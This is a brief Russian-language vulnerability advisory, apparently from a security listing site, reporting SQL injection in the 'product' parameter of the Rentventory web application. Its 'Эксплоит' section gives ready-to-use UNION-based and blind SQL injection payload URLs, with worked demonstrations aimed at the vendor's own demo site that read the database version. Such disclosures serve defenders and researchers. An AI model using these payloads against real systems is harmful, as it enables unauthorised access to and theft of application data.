Программа: Rentventory

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных различными сценариями. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

1. http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time

Демонстрация:

http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time

2. http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time

Демонстрация:

http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time



Оставить мнение